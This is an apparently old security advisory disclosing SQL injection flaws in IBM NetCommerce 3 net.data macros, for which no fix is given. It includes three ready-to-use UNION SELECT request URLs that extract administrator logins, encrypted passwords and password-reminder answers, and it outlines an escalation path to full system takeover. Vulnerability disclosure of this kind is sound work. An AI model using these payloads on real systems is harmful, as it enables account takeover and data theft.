COMMAND
NetCommerce
SYSTEMS AFFECTED
IBM NetCommerce 3 (others?)
PROBLEM
Rudi Carell found following. He found a couple of serious
security-holes within ibm s so called "netcommerce" thing which
seems to be a mixture of websphere, net.data, servlets, jsp s and
db2?
Besides well known websphere-bugs (file thru disclosure and
default-admin passwords), the most dangerous bugs result from
NON-existing input validation within netcommerc s net.data
"macros".
By crafting malformed http-requests it is possible to extract
"any" netcommerce-database-information.
Combining this method with other default-"netcommerce"
funcionality (PasswordReset for example) it is possible to take
hold of so called "store-" or "site-manager"-accounts.
Once you're an nc-administrator you are allowed to use all the
admin-tools. At this point youre able to up- and download files,
issue op-system-commands or do any query with the very very
high-privileged DB2INST1 account.
This can lead to a possible take-over of the whole system.... Many
"default-macros" are vulnerable to this (classic:-) sort of
attack.
A few examples:
1) "HowTo find Administrator Accounts"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
2) "Passwords(crypted)"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
3) "Password-Reminders"
http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
Of course "orderdspc.d2w" is not the only vulnerable macro .. it's
just an example. Casting between different data-types is possible
(read the db2-man pages).
Also it should (not proofed) be possible to query other databases.
This has been confirmed on Net.Commerce 3.1.2.
SOLUTION
Nothing yet.